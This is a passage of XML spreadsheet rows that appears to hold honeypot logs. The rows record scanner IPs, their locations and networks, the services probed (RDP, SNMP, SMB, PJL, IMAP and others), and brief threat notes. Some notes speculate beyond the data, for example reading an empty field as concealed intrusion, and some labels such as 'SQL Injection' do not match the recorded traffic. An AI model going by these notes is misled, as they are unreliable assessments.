mstshash=xBpYgT'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=BYfPNsJNh'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=ouArEA'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=znCxJk'}}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.28,63210)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.28,63222)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.28,63228)}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:cdd2:1f1c"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="The attacker is likely scanning for open services and probing the system for vulnerabilities, attempting to gain unauthorized access through various protocols such as FTP, HTTP, HTTPS, LDAP, MSSQL, MYSQL, NTP, Oracle, PJL, POP3, SMTP, SNMP, and SMB. &amp;&amp; Malicious activity detected, attacker attempting to establish secure connection through unauthorized FTP authentication request with TLS protocol enabled. _x000a_Possible attempt to exploit weak FTP server security or steal sensitive credentials by mimicking legitimate login attempts. _x000a_May indicate an initial reconnaissance phase of a larger attack. &amp;&amp; This indicates an attempt to enable TLS encryption during authentication for FTP service, which could be a step in exploiting the system or attempting unauthorized access. The activity suggests malicious intent as it's trying to secure the connection after initiating authentication. This behavior is suspicious as legitimate users would typically authenticate before requesting encryption."/>
    <s v="  &amp;&amp; TLS Brute &amp;&amp; TSL Auth"/>
  </r>
  <r>
    <x v="27"/>
    <x v="27"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T22:39:15"/>
    <d v="2023-09-13T08:34:01"/>
    <d v="2025-04-30T22:39:15"/>
    <n v="344"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_REDIS_H12&amp;&amp;SMA-LAB_REDIS_H40&amp;&amp;SMA-LAB_SNMP_H30&amp;&amp;SMA-LAB_MYSQL_H19&amp;&amp;SMA-LAB_PJL_H26&amp;&amp;SMA-LAB_RDP_H37&amp;&amp;SMA-LAB_SSH_H12&amp;&amp;SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_FTP_H37&amp;&amp;SMA-LAB_SIP_H22&amp;&amp;SMA-LAB_RDP_H44&amp;&amp;SMA-LAB_ORACLE_H26&amp;&amp;SMA-LAB_LDAP_H32&amp;&amp;SMA-LAB_PJL_H29&amp;&amp;SMA-LAB_PJL_H11&amp;&amp;SMA-LAB_FTP_H27&amp;&amp;SMA-LAB_PJL_H24&amp;&amp;SMA-LAB_PJL_H31&amp;&amp;SMA-LAB_FTP_H31&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_IMAP_H12&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_SOCKS5_H27&amp;&amp;SMA-LAB_SOCKS5_H15&amp;&amp;SMA-LAB_MYSQL_H44&amp;&amp;SMA-LAB_MT-CPA_H4&amp;&amp;SMA-LAB_FTP_H14&amp;&amp;SMA-LAB_RDP_H42&amp;&amp;SMA-LAB_VNC_H18&amp;&amp;SMA-LAB_SOCKS5_H10&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_MYSQL_H39&amp;&amp;SMA-LAB_SNMP_H16&amp;&amp;SMA-LAB_POSTGRES_H34&amp;&amp;SMA-LAB_IMAP_H7&amp;&amp;SMA-LAB_PJL_H38&amp;&amp;SMA-LAB_MYSQL_H33&amp;&amp;SMA-LAB_POSTGRES_H41&amp;&amp;SMA-LAB_ORACLE_H22&amp;&amp;SMA-LAB_FTP_H9&amp;&amp;SMA-LAB_NTP_H38&amp;&amp;SMA-LAB_MYSQL_H29&amp;&amp;SMA-LAB_SNMP_H15&amp;&amp;SMA-LAB_RDP_H40&amp;&amp;SMA-LAB_SNMP_H46"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;6379&amp;&amp;161&amp;&amp;3306&amp;&amp;9100&amp;&amp;3389&amp;&amp;22&amp;&amp;3656&amp;&amp;21&amp;&amp;NA&amp;&amp;1521&amp;&amp;5900&amp;&amp;143&amp;&amp;1433&amp;&amp;1080&amp;&amp;52883&amp;&amp;5432&amp;&amp;445&amp;&amp;8443&amp;&amp;443"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']}"/>
    <n v="68"/>
    <s v="True"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
    <s v="California"/>
    <s v="Santa Clara"/>
    <s v="Santa Clara"/>
    <s v="5393015"/>
    <s v="95054"/>
    <s v="37.3835"/>
    <s v="-121.983"/>
    <s v="396982"/>
    <s v="Google LLC"/>
    <s v="Google LLC"/>
    <s v="hosting"/>
    <s v="Palo Alto Networks, Inc"/>
    <s v="2022-01-11"/>
    <s v="PAN-22"/>
    <s v="2022-01-11"/>
    <s v="query&amp;&amp;connection&amp;&amp;command&amp;&amp;GET&amp;&amp;request"/>
    <s v="NA&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.135,62138)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.135,62140)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.135,62152)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.135,59258)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.135,64820)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.135,64836)}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_SIP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:cdd2:1f87"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="No MySQL database login attempts detected but the field for this type of activity is empty which may indicate an attempt to exploit or hide malicious access. _x000a_This could be indicative of an attacker trying to remain undetected by not accessing a specific account._x000a_The absence of data in this field may suggest suspicious activity has occurred here but was blocked or erased before being recorded."/>
    <s v="SQL Inj"/>
  </r>
  <r>
    <x v="28"/>
    <x v="28"/>
    <s v="118-232-48-16.dynamic.kbronet.com.tw&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-30T22:35:22"/>
    <d v="2025-02-25T08:40:13"/>
    <d v="2025-04-30T22:35:22"/>
    <n v="12"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H35"/>
    <s v="1433&amp;&amp;445"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0466"/>
    <s v="121.541"/>
    <s v="38841"/>
    <s v="kbro CO. Ltd."/>
    <s v="kbro CO. Ltd."/>
    <s v="business"/>
    <s v="KBRO"/>
    <s v="2007-11-01"/>
    <s v="KBRO-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (118.232.48.16,13506)}&amp;&amp;{Data_SMB:Incoming connection (118.232.48.16,13854)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="2007-08-27 14:41:18"/>
    <s v="2026-08-27 00:00:00"/>
    <s v="NA"/>
    <s v="ns1.kbronet.com.tw     211.76.112.59 _x000a_      ns2.kbronet.com.tw     211.76.112.60"/>
    <s v="TFN"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:76e8:3010"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="29"/>
    <x v="29"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T22:26:43"/>
    <d v="2024-04-15T10:31:09"/>
    <d v="2025-04-30T22:26:43"/>
    <n v="153"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:sip']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_IMAP_H4&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_POP3_H5&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_MYSQL_H5&amp;&amp;SMA-LAB_POSTGRES_H22&amp;&amp;SMA-LAB_SOCKS5_H9&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_SOCKS5_H5&amp;&amp;SMA-LAB_SOCKS5_H36&amp;&amp;SMA-LAB_SMB_H32&amp;&amp;SMA-LAB_MT-CPA_H31&amp;&amp;SMA-LAB_SNMP_H33&amp;&amp;SMA-LAB_IMAP_H15&amp;&amp;SMA-LAB_RDP_H42&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_MYSQL_H26&amp;&amp;SMA-LAB_MYSQL_H37&amp;&amp;SMA-LAB_SIP_H9&amp;&amp;SMA-LAB_ORACLE_H38&amp;&amp;SMA-LAB_LDAP_H3&amp;&amp;SMA-LAB_ORACLE_H34&amp;&amp;SMA-LAB_SNMP_H36&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_LDAP_HC1&amp;&amp;SMA-LAB_SOCKS5_H6&amp;&amp;SMA-LAB_SOCKS5_H16&amp;&amp;SMA-LAB_MT-CPA_H4&amp;&amp;SMA-LAB_SOCKS5_H18&amp;&amp;SMA-LAB_PJL_H38&amp;&amp;SMA-LAB_PJL_H28&amp;&amp;SMA-LAB_IMAP_H44&amp;&amp;SMA-LAB_IMAP_H31&amp;&amp;SMA-LAB_IMAP_H38&amp;&amp;SMA-LAB_LDAP_H34&amp;&amp;SMA-LAB_FTP_H44&amp;&amp;SMA-LAB_RDP_H46&amp;&amp;SMA-LAB_POSTGRES_H10&amp;&amp;SMA-LAB_IMAP_H19&amp;&amp;SMA-LAB_ORACLE_H35&amp;&amp;SMA-LAB_SNMP_H25&amp;&amp;SMA-LAB_SNMP_H21&amp;&amp;SMA-LAB_POSTGRES_H47&amp;&amp;SMA-LAB_MYSQL_H39&amp;&amp;SMA-LAB_SNMP_H22"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;143&amp;&amp;80&amp;&amp;110&amp;&amp;23&amp;&amp;3306&amp;&amp;5432&amp;&amp;1080&amp;&amp;5900&amp;&amp;445&amp;&amp;3394&amp;&amp;161&amp;&amp;3389&amp;&amp;NA&amp;&amp;1521&amp;&amp;50319&amp;&amp;9100&amp;&amp;21&amp;&amp;6379&amp;&amp;389&amp;&amp;52159&amp;&amp;1433&amp;&amp;49963"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['exploits']}"/>
    <n v="103"/>
    <s v="True"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
    <s v="California"/>
    <s v="Santa Clara"/>
    <s v="Santa Clara"/>
    <s v="5393015"/>
    <s v="95054"/>
    <s v="37.3835"/>
    <s v="-121.983"/>
    <s v="396982"/>
    <s v="Google LLC"/>
    <s v="Google LLC"/>
    <s v="hosting"/>
    <s v="Palo Alto Networks, Inc"/>
    <s v="2022-01-11"/>
    <s v="PAN-22"/>
    <s v="2022-01-11"/>
    <s v="query&amp;&amp;connection&amp;&amp;command&amp;&amp;GET&amp;&amp;stshash&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'User-Agent': 'Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&amp;#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.143,61028)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.143,61030)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.143,61046)}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=CWOUNUVQm'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=BzxdPY'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=UGQroA'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=yTPToaTJT'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=vZtIQw'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=KbSanw'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=LeXbaiXDg'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=xSAjxL'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=uJPCUQ'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SOCKS5:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:cdd2:1f8f"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="The data suggests that an attempt was made to access the Oracle database, which is a common target for attackers looking to steal sensitive information or gain unauthorized access._x000a_This could be part of a larger attack aimed at compromising database security. _x000a_The attacker likely used a tool or script to probe the database for vulnerabilities."/>
    <s v="SQL Injection"/>
  </r>
  <r>
    <x v="30"/>
    <x v="30"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T22:14:30"/>
    <d v="2025-02-12T18:35:49"/>
    <d v="2025-04-30T22:14:30"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="HR"/>
    <s v="Haryana"/>
    <s v="Gurugram"/>
    <s v="Gurugram (Sector 44)"/>
    <s v="1270644"/>
    <s v="122003"/>
    <s v="28.4498"/>
    <s v="77.0761"/>
    <s v="24186"/>
    <s v="RailTel Corporation of India Ltd."/>
    <s v="RailTel Corporation"/>
    <s v="business"/>
    <s v="RAILTEL"/>
    <s v="2015-11-10"/>
    <s v="RAILTEL-IN"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67c7:cb79"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="31"/>
    <x v="31"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T22:12:02"/>
    <d v="2024-10-28T09:30:38"/>
    <d v="2025-04-30T22:12:02"/>
    <n v="48"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H24"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IL"/>
    <s v="Israel"/>
    <s v="M"/>
    <s v="Central District"/>
    <s v="Nefat HaSharon"/>
    <s v="Yakum"/>
    <s v="293233"/>
    <s v="NA"/>
    <s v="32.2492"/>
    <s v="34.8419"/>
    <s v="12849"/>
    <s v="Hot-Net internet services Ltd."/>
    <s v="HOT mobile Ltd"/>
    <s v="cellular"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:258e:a259"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="No log data provided for analysis."/>
    <m/>
  </r>
  <r>
    <x v="32"/>
    <x v="32"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T22:12:00"/>
    <d v="2024-04-15T10:41:57"/>
    <d v="2025-04-30T22:12:00"/>
    <n v="91"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H5&amp;&amp;SMA-LAB_MSSQL_H2&amp;&amp;SMA-LAB_MSSQL_H30&amp;&amp;SMA-LAB_SMB_H8&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_MT-CPA_H30&amp;&amp;SMA-LAB_SMB_H32&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_SMB_H45&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H32"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;445&amp;&amp;21786&amp;&amp;NA&amp;&amp;46280"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="32"/>
    <s v="Kyiv"/>
    <s v="Vyshhorod Raion"/>
    <s v="Khotianivka"/>
    <s v="8519882"/>
    <s v="NA"/>
    <s v="50.5972"/>
    <s v="30.5714"/>
    <s v="29107"/>
    <s v="Synapse Network LTD"/>
    <s v="SYNAPSE"/>
    <s v="business"/>
    <s v="Private Stock company Sater"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (178.54.78.190,53068)}&amp;&amp;{Data_SMB:Incoming connection (178.54.78.190,53204)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (178.54.78.190,60030)}&amp;&amp;{Data_SMB:Incoming connection (178.54.78.190,60120)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (178.54.78.190,64044)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (178.54.78.190,64678)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (178.54.78.190,62562)}&amp;&amp;{Data_SMB:Incoming connection (178.54.78.190,63495)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (178.54.78.190,57699)}&amp;&amp;{Data_SMB:Incoming connection (178.54.78.190,57835)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (178.54.78.190,52654)}&amp;&amp;{Data_SMB:Incoming connection (178.54.78.190,52704)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (178.54.78.190,61220)}&amp;&amp;{Data_SMB:Incoming connection (178.54.78.190,61289)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (178.54.78.190,59194)}&amp;&amp;{Data_SMB:Incoming connection (178.54.78.190,59275)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (178.54.78.190,65149)}&amp;&amp;{Data_SMB:Incoming connection (178.54.78.190,65318)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (178.54.78.190,63304)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b236:4ebe"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="33"/>
    <x v="33"/>
    <s v="186-193-176-3.jupiter.com.br&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-30T22:11:51"/>
    <d v="2023-11-10T10:13:00"/>
    <d v="2025-04-30T22:11:51"/>
    <n v="61585"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H37&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_MSSQL_H5&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_MT-CPA_H35&amp;&amp;SMA-LAB_SMB_H32&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_SMB_H18&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H20"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;24219&amp;&amp;445&amp;&amp;1433&amp;&amp;4879&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="MA"/>
    <s v="Maranhão"/>
    <s v="Imperatriz"/>
    <s v="Imperatriz"/>
    <s v="3398269"/>
    <s v="NA"/>
    <s v="-5.52639"/>
    <s v="-47.4917"/>
    <s v="28191"/>
    <s v="Jupiter Telecomunicacoes e Informatica Ltda"/>
    <s v="Jupiter Telecomunicacoes e Informatica Ltda"/>
    <s v="business"/>
    <s v="Jupiter Telecomunicacoes e Informatica Ltda"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
